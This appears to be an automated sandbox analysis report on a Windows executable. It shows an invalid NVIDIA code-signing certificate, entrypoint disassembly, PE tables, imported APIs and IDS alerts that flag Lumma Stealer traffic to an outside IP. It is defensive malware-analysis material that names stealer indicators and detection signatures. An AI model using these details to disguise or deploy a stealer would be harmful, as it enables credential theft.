File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L>.."m.."m.."m.."m.."m...m.."m..)m.."m..(m.."mg.}m.."mj.,m.."m..#my."mj..m.."m..(m.."m..$m.."m..)mB."mRich.."m........PE..L..
Icon Hash: 4dd933f06831b24d
Entrypoint: 0x4ef5dc
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x676BB07E [Wed Dec 25 07:13:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: ff67bf11cc36c35722df0b7f1c459325
Signature Valid: false
Signature Issuer: CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 27/07/2015 20:00:00, 26/07/2018 19:59:59
Subject Chain
• CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
Version: 3
Thumbprint MD5: F7219078FBE20BC1B98BF8A86BFC0396
Thumbprint SHA-1: 30632EA310114105969D0BDA28FDCE267104754F
Thumbprint SHA-256: 1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
Serial: 14781BC862E8DC503A559346F5DCC518
Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0058B0F8h
push 004F5DC0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [00575374h]
xor edx, edx
mov dl, ah
mov dword ptr [0064A114h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0064A110h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0064A10Ch], ecx
shr eax, 10h
mov dword ptr [0064A108h], eax
push 00000001h
call 00007FD76086E306h
pop ecx
test eax, eax
jne 00007FD760867BEAh
push 0000001Ch
call 00007FD760867CA7h
pop ecx
call 00007FD76086E011h
test eax, eax
jne 00007FD760867BEAh
push 00000010h
call 00007FD760867C96h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007FD76086DE3Fh
call 00007FD76086DD99h
mov dword ptr [0064DA54h], eax
call 00007FD76086DC22h
mov dword ptr [0064A0F4h], eax
call 00007FD76086D9EFh
call 00007FD76086D932h
call 00007FD76086847Eh
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [005752DCh]
call 00007FD76086D8D6h
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007FD760867BE8h
movzx eax, word ptr [ebp-2Ch]
Programming Language:
• [ C ] VS98 (6.0) SP6 build 8804
• [EXP] VC++ 6.0 SP5 build 8804
• [C++] VS98 (6.0) SP6 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1acec0 | 0x12c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24f000 | 0xa3000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4902fd0 | 0x39c0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x175000 | 0x848 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x173bd8 | 0x174000 | 9aba2c97f567db009e0da8ba6a746c55 | False | 0.5098726005964381 | data | 6.683651481868028 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x175000 | 0x3ac1e | 0x3b000 | 7d90b567ca926b4c16bc3e8e715834a3 | False | 0.2986005362817797 | data | 4.777250629842978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1b0000 | 0x9e588 | 0x98000 | aa8a391fe0255a3eff2beea09b53776e | False | 0.108978271484375 | data | 1.9379617641950813 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24f000 | 0xa3000 | 0xa3000 | ca360f8e125702157eddf5d0b18e8d61 | False | 0.3978293951303681 | data | 6.218729318962462 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x299190 | 0x134 | data | English | United States | 0.37337662337662336
RT_CURSOR | 0x2992e0 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.6298701298701299
RT_CURSOR | 0x299430 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.5292207792207793
RT_CURSOR | 0x299580 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.487012987012987
RT_CURSOR | 0x2996d0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805
RT_CURSOR | 0x299808 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7
RT_BITMAP | 0x2691e0 | 0x4828 | Device independent bitmap graphic, 96 x 48 x 32, image size 18432, resolution 4379 x 4379 px/m | English | United States | 0.055381117366825466
RT_BITMAP | 0x275030 | 0x9c8 | Device independent bitmap graphic, 240 x 20 x 4, image size 2400 | English | United States | 0.06988817891373802
RT_BITMAP | 0x263c10 | 0x5128 | Device independent bitmap graphic, 216 x 24 x 32, image size 20736, resolution 18142 x 18142 px/m | English | United States | 0.1476703889102811
RT_BITMAP | 0x277108 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.29310344827586204
RT_BITMAP | 0x26dbe0 | 0x6c28 | Device independent bitmap graphic, 288 x 24 x 32, image size 27648, resolution 2835 x 2835 px/m | English | United States | 0.05226090725223924
RT_BITMAP | 0x2759f8 | 0x628 | Device independent bitmap graphic, 32 x 12 x 32, image size 1536, resolution 226743 x 226743 px/m | English | United States | 0.11294416243654823
RT_BITMAP | 0x274808 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 18898 x 18898 px/m | English | United States | 0.09434865900383142
RT_BITMAP | 0x268d38 | 0x4a8 | Device independent bitmap graphic, 24 x 12 x 32, image size 1152, resolution 18142 x 18142 px/m | English | United States | 0.1610738255033557
RT_BITMAP | 0x2603c0 | 0x3028 | Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 3309 x 3309 px/m | English | United States | 0.06878650227125244
RT_BITMAP | 0x26da08 | 0x1d8 | Device independent bitmap graphic, 12 x 12 x 24, image size 432 | English | United States | 0.13347457627118645
RT_BITMAP | 0x2633e8 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 91169 x 91169 px/m | English | United States | 0.15373563218390804
RT_BITMAP | 0x276c48 | 0x2c8 | Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 18142 x 18142 px/m | English | United States | 0.0800561797752809
RT_BITMAP | 0x276f10 | 0x1f8 | Device independent bitmap graphic, 80 x 10 x 4, image size 400 | English | United States | 0.31547619047619047
RT_BITMAP | 0x2771f0 | 0x9c8 | Device independent bitmap graphic, 28 x 22 x 32, image size 2464, resolution 2835 x 2835 px/m | English | United States | 0.04033546325878594
RT_BITMAP | 0x28d4a8 | 0x1228 | Device independent bitmap graphic, 48 x 24 x 32, image size 4608, resolution 2835 x 2835 px/m | English | United States | 0.08067986230636832
RT_BITMAP | 0x276020 | 0xc28 | Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/m | English | United States | 0.17898457583547558
RT_BITMAP | 0x277bb8 | 0x3b8 | Device independent bitmap graphic, 12 x 19 x 32, image size 912, resolution 2835 x 2835 px/m | English | United States | 0.13130252100840337
RT_BITMAP | 0x277f70 | 0x2b48 | Device independent bitmap graphic, 120 x 23 x 32, image size 11040, resolution 2835 x 2835 px/m | English | United States | 0.032310469314079424
RT_BITMAP | 0x27aab8 | 0xc28 | Device independent bitmap graphic, 32 x 32 x 24, image size 3072 | English | United States | 0.046593830334190234
RT_BITMAP | 0x27b6e0 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.03667820069204152
RT_BITMAP | 0x27e408 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.01591695501730104
RT_BITMAP | 0x281130 | 0x628 | Device independent bitmap graphic, 32 x 16 x 24, image size 1536, resolution 2835 x 2835 px/m | English | United States | 0.15545685279187818
RT_BITMAP | 0x281758 | 0x5128 | Device independent bitmap graphic, 144 x 48 x 24, image size 20736, resolution 2835 x 2835 px/m | English | United States | 0.03176742395071236
RT_BITMAP | 0x286880 | 0x6c28 | Device independent bitmap graphic, 288 x 24 x 32, image size 27648, resolution 2835 x 2835 px/m | English | United States | 0.034563709910430514
RT_BITMAP | 0x28e6d0 | 0x48 | Device independent bitmap graphic, 1 x 8 x 32, image size 32, resolution 2835 x 2835 px/m | English | United States | 0.4166666666666667
RT_BITMAP | 0x28e718 | 0xca8 | Device independent bitmap graphic, 80 x 10 x 32, image size 3200, resolution 2835 x 2835 px/m | English | United States | 0.06419753086419754
RT_BITMAP | 0x28f3c0 | 0xc28 | Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/m | English | United States | 0.17030848329048842
RT_BITMAP | 0x2998e8 | 0x5e4 | Device independent bitmap graphic, 70 x 39 x 4, image size 1404 | English | United States | 0.34615384615384615
RT_BITMAP | 0x299fb8 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346
RT_BITMAP | 0x29a070 | 0x16c | Device independent bitmap graphic, 39 x 13 x 4, image size 260 | English | United States | 0.28296703296703296
RT_BITMAP | 0x29a1e0 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965
RT_ICON | 0x250980 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.0547945205479452
RT_ICON | 0x254ba8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.0979253112033195
RT_ICON | 0x257150 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.10553470919324578
RT_ICON | 0x2581f8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.22340425531914893
RT_ICON | 0x2586a0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.0547945205479452
RT_ICON | 0x25c8c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.0979253112033195
RT_ICON | 0x25ee70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.10553470919324578
RT_ICON | 0x25ff18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.22340425531914893
RT_MENU | 0x290018 | 0x4f4 | data | English | United States | 0.3383280757097792
RT_MENU | 0x290510 | 0xa36 | data | English | United States | 0.2620504973221117
RT_DIALOG | 0x2914c0 | 0x2c8 | data | English | United States | 0.5196629213483146
RT_DIALOG | 0x2947c8 | 0x4d0 | data | English | United States | 0.4074675324675325
RT_DIALOG | 0x292318 | 0x290 | data | English | United States | 0.46646341463414637
RT_DIALOG | 0x291170 | 0x34e | data | English | United States | 0.45271867612293143
RT_DIALOG | 0x291d90 | 0x582 | data | English | United States | 0.4049645390070922
RT_DIALOG | 0x2931c0 | 0x30e | data | English | United States | 0.4833759590792839
RT_DIALOG | 0x293858 | 0x394 | data | English | United States | 0.4585152838427948
RT_DIALOG | 0x2925a8 | 0x542 | data | English | United States | 0.38781575037147104
RT_DIALOG | 0x2918a8 | 0x4e6 | data | English | United States | 0.386762360446571
RT_DIALOG | 0x2936f8 | 0x160 | data | English | United States | 0.625
RT_DIALOG | 0x292af0 | 0x19e | data | English | United States | 0.5942028985507246
RT_DIALOG | 0x295e68 | 0x316 | data | English | United States | 0.49746835443037973
RT_DIALOG | 0x292c90 | 0x418 | data | English | United States | 0.40553435114503816
RT_DIALOG | 0x2934d0 | 0x222 | data | English | United States | 0.5842490842490843
RT_DIALOG | 0x2942a0 | 0x528 | data | English | United States | 0.4287878787878788
RT_DIALOG | 0x291788 | 0x11a | data | English | United States | 0.6453900709219859
RT_DIALOG | 0x290f80 | 0x1ea | data | English | United States | 0.6122448979591837
RT_DIALOG | 0x2930a8 | 0x112 | data | English | United States | 0.6423357664233577
RT_DIALOG | 0x293bf0 | 0x336 | data | English | United States | 0.4781021897810219
RT_DIALOG | 0x293f28 | 0x184 | data | English | United States | 0.5438144329896907
RT_DIALOG | 0x2940b0 | 0x1ee | data | English | United States | 0.5323886639676113
RT_DIALOG | 0x294c98 | 0x5a6 | data | English | United States | 0.39557399723374825
RT_DIALOG | 0x295240 | 0x54a | data | English | United States | 0.39807976366322007
RT_DIALOG | 0x295790 | 0x362 | data | English | United States | 0.4457274826789838
RT_DIALOG | 0x295af8 | 0x36a | data | English | United States | 0.43592677345537756
RT_DIALOG | 0x296180 | 0x598 | data | English | United States | 0.4155027932960894
RT_DIALOG | 0x296718 | 0x238 | data | English | United States | 0.4841549295774648
RT_DIALOG | 0x296950 | 0x102 | data | English | United States | 0.6550387596899225
RT_DIALOG | 0x296a58 | 0x130 | data | English | United States | 0.625
RT_DIALOG | 0x296b88 | 0x1ee | data | English | United States | 0.5263157894736842
RT_DIALOG | 0x296d78 | 0x184 | data | English | United States | 0.5438144329896907
RT_DIALOG | 0x296f00 | 0x238 | data | English | United States | 0.4841549295774648
RT_DIALOG | 0x297138 | 0x4d0 | data | English | United States | 0.4074675324675325
RT_DIALOG | 0x297608 | 0x598 | data | English | United States | 0.4155027932960894
RT_DIALOG | 0x297ba0 | 0x418 | data | English | United States | 0.40553435114503816
RT_DIALOG | 0x299ed0 | 0xe8 | data | English | United States | 0.6336206896551724
RT_STRING | 0x29a328 | 0xea | data | English | United States | 0.38461538461538464
RT_STRING | 0x29a770 | 0x1d2 | data | English | United States | 0.3605150214592275
RT_STRING | 0x29af00 | 0x1ba | data | English | United States | 0.38009049773755654
RT_STRING | 0x29b260 | 0x150 | Matlab v4 mat-file (little endian) E, numeric, rows 0, columns 0 | English | United States | 0.40476190476190477
RT_STRING | 0x29b3b0 | 0x1d8 | data | English | United States | 0.4279661016949153
RT_STRING | 0x29b0c0 | 0x19a | data | English | United States | 0.4170731707317073
RT_STRING | 0x29ac38 | 0x2c8 | data | English | United States | 0.3061797752808989
RT_STRING | 0x29b588 | 0x56 | Matlab v4 mat-file (little endian) d, numeric, rows 0, columns 0 | English | United States | 0.6511627906976745
RT_STRING | 0x29a948 | 0x2ec | data | English | United States | 0.3048128342245989
RT_STRING | 0x29b5e0 | 0x1fc | data | English | United States | 0.24803149606299213
RT_STRING | 0x29a740 | 0x2c | Lotus unknown worksheet or configuration, revision 0x25 | English | United States | 0.4772727272727273
RT_STRING | 0x29a418 | 0x46 | data | English | United States | 0.6571428571428571
RT_STRING | 0x29a460 | 0xd8 | data | English | United States | 0.5601851851851852
RT_STRING | 0x29a538 | 0x78 | data | English | United States | 0.5916666666666667
RT_STRING | 0x29a5b0 | 0x124 | data | English | United States | 0.4246575342465753
RT_STRING | 0x29a6d8 | 0x62 | data | English | United States | 0.6530612244897959
RT_STRING | 0x29b7e0 | 0x82 | StarOffice Gallery theme p, 536899072 objects, 1st n | English | United States | 0.7153846153846154
RT_STRING | 0x29b868 | 0x2a | data | English | United States | 0.5476190476190477
RT_STRING | 0x29b898 | 0x14a | data | English | United States | 0.5060606060606061
RT_STRING | 0x29b9e8 | 0x4e2 | data | English | United States | 0.376
RT_STRING | 0x29c260 | 0x2a2 | data | English | United States | 0.28338278931750743
RT_STRING | 0x29bf80 | 0x2dc | data | English | United States | 0.36885245901639346
RT_STRING | 0x29bed0 | 0xac | data | English | United States | 0.45348837209302323
RT_STRING | 0x29cc38 | 0xde | data | English | United States | 0.536036036036036
RT_STRING | 0x29c508 | 0x4c4 | data | English | United States | 0.3221311475409836
RT_STRING | 0x29c9d0 | 0x264 | data | English | United States | 0.3741830065359477
RT_STRING | 0x29cd18 | 0x2c | data | English | United States | 0.5227272727272727
RT_ACCELERATOR | 0x290f48 | 0x38 | data | English | United States | 0.875
RT_GROUP_CURSOR | 0x299568 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x2996b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x2992c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x299418 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                                                                                                                                                    RT_GROUP_CURSOR0x2998c00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                    RT_GROUP_ICON0x2586600x3edataEnglishUnited States0.8225806451612904
                                                                                                                                                    RT_GROUP_ICON0x2603800x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                    RT_VERSION0x297fb80x37cdataEnglishUnited States0.4439461883408072
                                                                                                                                                    RT_MANIFEST0x298fa80x1e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5503080082135524
                                                                                                                                                    None0x2987380x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x298b380x6adataEnglishUnited States0.7358490566037735
                                                                                                                                                    None0x2985380x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x2983380x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x2989380x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x298ba80x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x298da80x200dataEnglishUnited States0.482421875
                                                                                                                                                    None0x28ffe80x20dataEnglishUnited States1.1875
                                                                                                                                                    None0x2900080xadataEnglishUnited States1.6
DLL | Import
KERNEL32.dll | GetTimeZoneInformation, GetSystemTime, GetLocalTime, CreateThread, ExitThread, HeapSize, SetStdHandle, GetFileType, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetEnvironmentStrings, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetStartupInfoA, GetModuleFileNameA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, CompareStringA, CompareStringW, SetUnhandledExceptionFilter, GetCurrentDirectoryA, LCMapStringA, LCMapStringW, IsBadReadPtr, IsBadCodePtr, GetCPInfo, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, GetStringTypeA, HeapReAlloc, GetDriveTypeA, GetLocaleInfoW, GetACP, GetOEMCP, SetEnvironmentVariableA, GetLastError, CreateMutexW, lstrcmpW, FreeLibrary, GetProcAddress, LoadLibraryW, GetModuleHandleW, lstrcpynW, GetVersionExW, lstrlenW, Sleep, GlobalUnlock, GlobalLock, GlobalAlloc, DeleteFileW, MoveFileW, CopyFileW, LocalFree, FormatMessageW, GetShortPathNameW, GetFileAttributesExW, CreateDirectoryW, GetTempPathW, GetCurrentProcess, GetPrivateProfileStringW, CloseHandle, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, TerminateProcess, FreeConsole, InterlockedExchange, GetProfileStringA, GlobalAddAtomA, FindResourceA, GetDriveTypeW, RaiseException, HeapAlloc, HeapFree, RtlUnwind, ExitProcess, GetStartupInfoW, SetErrorMode, FindResourceExW, GetCurrentDirectoryW, SystemTimeToFileTime, LocalFileTimeToFileTime, FindNextFileW, GetProfileIntW, GetThreadLocale, GetStringTypeExW, GetVolumeInformationW, FindFirstFileW, FindClose, UnlockFile, LockFile, DuplicateHandle, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, GetProcessVersion, GlobalFlags, lstrcmpiW, FileTimeToLocalFileTime, FileTimeToSystemTime, lstrcmpA, lstrcmpiA, GetCurrentThread, GlobalGetAtomNameW, CreateEventW, SuspendThread, SetEvent, LoadLibraryA, FindResourceW, GetVersion, lstrcatW, GetCurrentThreadId, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, lstrcpyW, GetDiskFreeSpaceW, GetFileTime, SetFileTime, GetFullPathNameW, GetTempFileNameW, GetFileAttributesW, lstrlenA, InterlockedDecrement, InterlockedIncrement, MulDiv, GetModuleHandleA, SetLastError, SetFilePointer, SizeofResource, LoadResource, GenerateConsoleCtrlEvent, LockResource, GlobalSize, GetFileSize, SetCurrentDirectoryW, GlobalFree, FlushFileBuffers, WriteFile, ReadFile, SetFilePointerEx, SetEndOfFile, GetFileSizeEx, CreateFileW, AreFileApisANSI, SetFileAttributesW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetWindowsDirectoryW, GetTickCount, GetModuleFileNameW, MultiByteToWideChar, WideCharToMultiByte, ResumeThread, TerminateThread, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, DeleteCriticalSection, SetThreadPriority, AttachConsole, GetStringTypeW
USER32.dll | SetRectEmpty, wvsprintfW, EndDialog, CreateDialogIndirectParamW, GetActiveWindow, ValidateRect, WindowFromPoint, ShowWindow, MoveWindow, SetWindowTextW, IsDialogMessageW, IsDlgButtonChecked, SetDlgItemTextW, SetDlgItemInt, GetDlgItemInt, CheckDlgButton, SendDlgItemMessageW, SendDlgItemMessageA, MapWindowPoints, PeekMessageW, SetActiveWindow, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetTopWindow, IsChild, WinHelpW, GetClassInfoW, RegisterClassW, TrackPopupMenu, GetDlgItem, GetWindowTextLengthW, GetWindowTextW, DestroyWindow, SetWindowsHookExW, CallNextHookEx, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, GetForegroundWindow, IntersectRect, SystemParametersInfoW, GetWindowPlacement, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuW, SetMenuItemBitmaps, EnableMenuItem, GetNextDlgTabItem, wsprintfW, UnhookWindowsHookEx, EndPaint, BeginPaint, GetWindowDC, MessageBoxW, LoadAcceleratorsW, SetPropW, SetClassLongW, SetMenu, HideCaret, ShowCaret, ExcludeUpdateRgn, GetWindowTextA, DrawTextA, GetClassInfoA, DefDlgProcA, DefWindowProcA, DestroyMenu, GetMessageW, TranslateMessage, DispatchMessageW, GetMenuStringW, FindWindowW, ExitWindowsEx, EmptyClipboard, SetClipboardData, GetClipboardData, CloseClipboard, OpenClipboard, DrawFocusRect, ReleaseDC, KillTimer, SetTimer, ScreenToClient, TranslateAcceleratorW, ReuseDDElParam, UnpackDDElParam, BringWindowToTop, IsZoomed, PostQuitMessage, ShowOwnedPopups, RegisterClipboardFormatW, GetAsyncKeyState, MapDialogRect, SetRect, LoadStringW, GetClassNameW, GetSysColorBrush, CharUpperW, IsWindowEnabled, SetFocus, RegisterWindowMessageW, GetDlgCtrlID, SetWindowPos, GetMenu, GetMenuItemCount, GetMenuItemID, GetWindowLongW, SetWindowLongW, DeleteMenu, GetKeyState, OffsetRect, InflateRect, GetSysColor, GetFocus, BeginDeferWindowPos, EndDeferWindowPos, GetCursorPos, ReleaseCapture, GetCapture, ClientToScreen, SetCursorPos, PtInRect, SetCursor, CharNextA, CallWindowProcA, RemovePropA, SetWindowsHookExA, GetWindowLongA, SendMessageA, IsWindowUnicode, GetClassNameA, SetWindowLongA, SetPropA, GetPropA, SetCapture, GrayStringW, DrawTextW, TabbedTextOutW, IsClipboardFormatAvailable, PostThreadMessageW, SetParent, LockWindowUpdate, RemovePropW, GetDCEx, GetParent, GetDesktopWindow, GetWindow, GetPropW, IsIconic, GetLastActivePopup, UpdateWindow, TrackPopupMenuEx, InvalidateRect, IsWindowVisible, GetSystemMenu, InsertMenuW, CheckMenuItem, DestroyIcon, LoadIconW, LoadImageW, GetDC, CopyRect, GetWindowRect, PostMessageW, IsWindow, LoadMenuW, GetClientRect, GetSubMenu, SetMenuDefaultItem, GetSystemMetrics, SendMessageW, SetForegroundWindow, EnableWindow, DestroyCursor, LoadBitmapW, LoadCursorW, GetWindowTextLengthA, UnregisterClassW, CreateWindowExW
GDI32.dll | SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, GetDeviceCaps, CreateSolidBrush, CreatePatternBrush, SetRectRgn, GetCharWidthW, CreateFontW, GetTextMetricsW, EnumFontFamiliesExW, CopyMetaFileW, CreateRectRgn, CombineRgn, SetTextColor, SetBkMode, SetBkColor, SaveDC, GetClipBox, CreateRectRgnIndirect, ExtSelectClipRgn, SetStretchBltMode, StretchDIBits, SetDIBitsToDevice, RestoreDC, CreateDIBSection, DeleteDC, PatBlt, DeleteObject, SelectObject, GetBkMode, GetTextExtentPoint32W, GetBkColor, GetTextColor, BitBlt, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, CreateCompatibleBitmap, CreateCompatibleDC, CreateBitmap, GetStockObject, GetObjectW, ExtTextOutA, GetTextExtentPointA, CreateDIBitmap, CreateFontIndirectW
comdlg32.dll | GetFileTitleW, GetSaveFileNameW, GetOpenFileNameW
WINSPOOL.DRV | OpenPrinterW, DocumentPropertiesW, ClosePrinter
ADVAPI32.dll | RegQueryValueW, RegSetValueExW, RegCreateKeyW, RegSetValueW, RegDeleteKeyW, RegEnumKeyW, RegOpenKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegDeleteValueW, SetFileSecurityW, GetFileSecurityW, RegCloseKey
SHELL32.dll | DragAcceptFiles, ShellExecuteW, DragQueryFileW, SHGetSpecialFolderPathW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetMalloc, SHGetDesktopFolder, SHFileOperationW, ExtractIconW, SHGetFileInfoW, DragFinish
COMCTL32.dll | ImageList_DragLeave, ImageList_DragEnter, ImageList_BeginDrag, ImageList_DragMove, ImageList_GetImageInfo, ImageList_Draw, ImageList_AddMasked, ImageList_EndDrag, _TrackMouseEvent, ImageList_SetBkColor, ImageList_Destroy, ImageList_Create, PropertySheetW, DestroyPropertySheetPage, CreatePropertySheetPageW, ImageList_DrawIndirect, ImageList_GetImageCount
oledlg.dll | OleUIBusyW
ole32.dll | CoTaskMemAlloc, RevokeDragDrop, OleDuplicateData, RegisterDragDrop, OleGetClipboard, ReleaseStgMedium, CoFreeUnusedLibraries, OleUninitialize, OleInitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoCreateGuid, OleIsCurrentClipboard, CoRegisterMessageFilter, CoRevokeClassObject, CoLockObjectExternal, OleFlushClipboard
OLEAUT32.dll | SysFreeString, SysAllocString, VariantClear, VarBstrFromDate
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
SHLWAPI.dll | PathGetCharTypeW, PathIsRootW, PathRemoveFileSpecW, PathIsURLW, PathFindExtensionW, PathFileExistsW, PathIsDirectoryW, PathFindFileNameW
WINHTTP.dll | WinHttpOpenRequest, WinHttpCrackUrl, WinHttpAddRequestHeaders, WinHttpReadData, WinHttpCloseHandle, WinHttpSendRequest, WinHttpSetOption, WinHttpQueryOption, WinHttpQueryHeaders, WinHttpOpen, WinHttpConnect, WinHttpReceiveResponse
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-05T17:54:15.384083+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 104.21.90.109 | 443 | TCP
2025-01-05T17:54:15.895405+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49748 | 104.21.90.109 | 443 | TCP
